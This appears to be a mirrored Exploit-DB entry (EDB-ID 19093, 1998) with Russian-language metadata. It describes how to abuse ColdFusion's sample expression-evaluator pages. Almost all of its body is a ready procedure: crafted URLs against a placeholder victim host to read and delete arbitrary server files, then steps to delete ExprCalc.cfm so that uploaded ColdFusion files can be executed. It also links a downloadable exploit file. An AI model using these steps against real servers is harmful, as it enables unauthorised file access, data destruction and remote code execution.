- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 19093
- Проверка EDB
-
- Пройдено
- Автор
- RAIN.FOREST.PUPPY
- Тип уязвимости
- REMOTE
- Платформа
- MULTIPLE
- CVE
- cve-1999-0477 cve-1999-0455
- Дата публикации
- 1998-12-25
Код:
source: https://www.securityfocus.com/bid/115/info
To display and delete any file on the system use an URL of the following form:
http://www.victim.test/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=C:\the\target\file
To upload files to the sever first find out the location of the sample code on the server by uploading a dummy file by using http://www.victim.test/cfdocs/expeval/openfile.cfm. After uploading a dummy file it will be displayed for you. The URL will be for the form:
http://www.victim.test/cfdocs/expeval/ExprCalc.cfm?RequestTimeout=2000&OpenFilePath=C:\Inetpub\wwwroot\cfdocs\expeval\.\dummy.txt
Now replace the "dummy.txt" string by "ExprCalc.cfm" to delete that file. We can now upload and execute ColdFusion files in the server without them being deleted.
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19093.cfm- Источник
- www.exploit-db.com
